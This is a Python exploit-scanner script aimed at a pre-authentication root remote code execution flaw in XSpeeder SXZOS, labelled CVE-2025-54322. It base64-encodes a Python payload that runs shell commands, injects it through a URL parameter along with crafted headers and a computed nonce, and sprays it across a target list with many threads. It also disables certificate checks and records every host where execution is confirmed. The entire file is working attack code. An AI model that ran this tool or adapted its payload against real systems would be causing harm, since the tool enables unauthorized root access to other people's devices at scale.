#!/usr/bin/env python3 import requests import sys import time import re import urllib3 from base64 import b64encode from requests.packages.urllib3.exceptions import InsecureRequestWarning from requests.adapters import HTTPAdapter from urllib3.exceptions import InsecureRequestWarning as URLLib3InsecureWarning from concurrent.futures import ThreadPoolExecutor, as_completed from threading import Lock #By Chirag Artani # Disable all SSL warnings urllib3.disable_warnings(URLLib3InsecureWarning) urllib3.disable_warnings(InsecureRequestWarning) requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # Thread-safe locks print_lock = Lock() file_lock = Lock() def safe_print(message): """Thread-safe printing""" with print_lock: print(message) def write_vulnerable(url, output, status): """Thread-safe file writing for vulnerable hosts""" with file_lock: with open('vuln-confirm.txt', 'a') as f: f.write(f"{url}\n") f.write(f"Status: {status}\n") f.write(f"Output: {output}\n") f.write("-"*70 + "\n") class SSLAdapter(HTTPAdapter): """Custom adapter to handle SSL issues""" def init_poolmanager(self, *args, **kwargs): kwargs['ssl_version'] = urllib3.util.ssl_.PROTOCOL_TLS kwargs['cert_reqs'] = 'CERT_NONE' kwargs['assert_hostname'] = False return super().init_poolmanager(*args, **kwargs) class XspeederScanner: def __init__(self, target_url, max_retries=2, thread_id=None): self.target_url = target_url.rstrip('/') self.max_retries = max_retries self.thread_id = thread_id self.session = self._create_session() # Regex to match uid/gid output from 'id' command self.id_regex = re.compile(r'uid=\d+\([a-zA-Z0-9_-]+\)\s+gid=\d+\([a-zA-Z0-9_-]+\)') def _create_session(self): """Create a requests session with SSL bypass""" session = requests.Session() # Mount custom SSL adapter for both HTTP and HTTPS adapter = SSLAdapter() session.mount('http://', adapter) session.mount('https://', adapter) # Set default headers session.headers.update({ 'Connection': 'close', 'Accept': '*/*' }) return session def build_payload(self): """Build the exploit payload with 'id' command - MATCHING ORIGINAL""" cmd = 'id' # Use os.system() like original PoC, but capture output payload = f'__import__("os").system("{cmd}") or __import__("subprocess").check_output("{cmd}", shell=True).decode() #sUserCodexsPwd' encoded_payload = b64encode(payload.encode()).decode("utf-8") return encoded_payload def calculate_nonce(self): """Calculate the time-based nonce for X-SXZ-R header""" return str(int(time.time() / 60) % 7) def warm_session(self, headers): """Warm up the session - MATCHING ORIGINAL (no validation)""" try: warmup_url = f"{self.target_url}/webInfos/" self.session.get( warmup_url, headers=headers, verify=False, timeout=20, allow_redirects=True ) return True except requests.exceptions.Timeout: return True except Exception: return False def send_exploit(self, headers, payload): """Send the actual exploit request""" try: exploit_url = f"{self.target_url}/?title=ABC&oIp=XXX&chkid={payload}" response = self.session.get( exploit_url, headers=headers, verify=False, timeout=20, allow_redirects=False ) return response except Exception: return None def check_vulnerability(self): """Main function to check if target is vulnerable""" for attempt in range(1, self.max_retries + 1): try: # Calculate fresh nonce for each attempt nonce = self.calculate_nonce() headers = { 'User-Agent': 'SXZ/2.3', 'X-SXZ-R': nonce, 'Accept': '*/*' } # Step 1: Warm up session if not self.warm_session(headers): if attempt < self.max_retries: time.sleep(1) continue return { 'vulnerable': False, 'status': 'Connection completely failed', 'output': None } # Small delay between requests time.sleep(0.3) # Step 2: Send exploit payload = self.build_payload() response = self.send_exploit(headers, payload) if response is None: if attempt < self.max_retries: time.sleep(1) continue return { 'vulnerable': False, 'status': 'Exploit delivery failed', 'output': None } # Check response for 'id' command output response_text = response.text # Look for uid/gid pattern in response id_match = self.id_regex.search(response_text) if id_match: return { 'vulnerable': True, 'status': 'VULNERABLE - RCE Confirmed', 'output': id_match.group(0), 'status_code': response.status_code, 'full_response': response_text[:500] } # Check for other indicators (partial match) if 'uid=' in response_text or 'gid=' in response_text: return { 'vulnerable': True, 'status': 'LIKELY VULNERABLE - Partial match', 'output': response_text[:200], 'status_code': response.status_code } # Check for error indicators that suggest code execution execution_indicators = [ 'CalledProcessError', 'subprocess', 'Traceback', 'NameError', 'SyntaxError', 'eval' ] if any(indicator in response_text for indicator in execution_indicators): return { 'vulnerable': True, 'status': 'POTENTIALLY VULNERABLE - Code execution indicators found', 'output': response_text[:300], 'status_code': response.status_code } # If no match and we have retries left, try again if attempt < self.max_retries: time.sleep(1) continue return { 'vulnerable': False, 'status': 'Not vulnerable', 'output': None, 'status_code': response.status_code } except Exception as e: if attempt < self.max_retries: time.sleep(1) continue return { 'vulnerable': False, 'status': f'Error: {str(e)[:100]}', 'output': None } return { 'vulnerable': False, 'status': 'Max retries exceeded', 'output': None } def load_targets(filename): """Load targets from file""" try: with open(filename, 'r') as f: targets = [line.strip() for line in f if line.strip() and not line.startswith('#')] return targets except FileNotFoundError: print(f"[-] Error: File '{filename}' not found") sys.exit(1) except Exception as e: print(f"[-] Error reading file: {e}") sys.exit(1) def scan_target(target, thread_id): """Scan a single target (thread worker function)""" scanner = XspeederScanner(target, max_retries=2, thread_id=thread_id) result = scanner.check_vulnerability() return target, result def print_vulnerable(target, result): """Print only vulnerable results (thread-safe)""" output = [] output.append(f"\n{'='*70}") output.append(f"[+] VULNERABLE: {target}") output.append(f"[+] Status: {result['status']}") if 'status_code' in result: output.append(f"[+] HTTP Status: {result['status_code']}") output.append(f"[+] Output: {result['output']}") output.append(f"{'='*70}\n") safe_print('\n'.join(output)) def main(): banner = """ ╔═══════════════════════════════════════════════════════════════╗ ║ XSpeeder SXZOS (CVE-2025-54322) RCE Scanner ║ ║ Pre-Auth Root RCE Vulnerability Checker ║ ║ Showing: VULNERABLE HOSTS ONLY ║ ╚═══════════════════════════════════════════════════════════════╝ """ print(banner) if len(sys.argv) < 2 or len(sys.argv) > 3: print("[-] Usage: python3 scanner.py [threads]") print("[-] Example: python3 scanner.py targets.txt 20") print("[-] Default threads: 10") sys.exit(1) targets_file = sys.argv[1] max_threads = int(sys.argv[2]) if len(sys.argv) == 3 else 10 # Validate thread count if max_threads < 1 or max_threads > 50: print("[-] Thread count must be between 1 and 50") sys.exit(1) targets = load_targets(targets_file) # Clear the output file with open('vuln-confirm.txt', 'w') as f: f.write(f"XSpeeder SXZOS CVE-2025-54322 - Vulnerable Hosts\n") f.write(f"Scan started: {time.strftime('%Y-%m-%d %H:%M:%S')}\n") f.write("="*70 + "\n\n") print(f"[*] Loaded {len(targets)} targets from {targets_file}") print(f"[*] Using {max_threads} concurrent threads") print(f"[*] Vulnerable hosts will be saved to: vuln-confirm.txt") print(f"[*] Starting scan...\n") vulnerable_count = 0 processed = 0 start_time = time.time() # Threading with ThreadPoolExecutor with ThreadPoolExecutor(max_workers=max_threads) as executor: # Submit all tasks future_to_target = { executor.submit(scan_target, target, i): target for i, target in enumerate(targets, 1) } try: # Process completed tasks for future in as_completed(future_to_target): target = future_to_target[future] processed += 1 try: target_url, result = future.result() # Only print and save if vulnerable if result['vulnerable']: vulnerable_count += 1 print_vulnerable(target_url, result) write_vulnerable(target_url, result['output'], result['status']) # Print progress every 50 hosts if processed % 50 == 0: safe_print(f"[*] Progress: {processed}/{len(targets)} | Found: {vulnerable_count} vulnerable") except Exception as e: safe_print(f"[!] Error processing {target}: {e}") except KeyboardInterrupt: safe_print("\n\n[!] Scan interrupted by user. Waiting for active threads to finish...") executor.shutdown(wait=True) elapsed_time = time.time() - start_time # Final Summary print(f"\n{'='*70}") print(f"[*] SCAN COMPLETE") print(f"{'='*70}") print(f"[*] Total Time: {elapsed_time:.2f} seconds") print(f"[*] Total Targets Scanned: {len(targets)}") print(f"[*] Vulnerable Hosts Found: {vulnerable_count}") print(f"[*] Success Rate: {(vulnerable_count/len(targets)*100):.2f}%") print(f"[*] Average Time per Target: {elapsed_time/len(targets):.2f} seconds") print(f"{'='*70}\n") if vulnerable_count > 0: print(f"[+] All vulnerable hosts saved to: vuln-confirm.txt") print(f"[+] Total vulnerable: {vulnerable_count}/{len(targets)}") else: print(f"[-] No vulnerable hosts found") # Append summary to file with open('vuln-confirm.txt', 'a') as f: f.write("\n" + "="*70 + "\n") f.write(f"Scan completed: {time.strftime('%Y-%m-%d %H:%M:%S')}\n") f.write(f"Total scanned: {len(targets)}\n") f.write(f"Vulnerable: {vulnerable_count}\n") f.write(f"Time taken: {elapsed_time:.2f} seconds\n") if __name__ == "__main__": try: main() except KeyboardInterrupt: print("\n\n[!] Script terminated by user") sys.exit(0) except Exception as e: print(f"\n[!] Fatal error: {e}") sys.exit(1)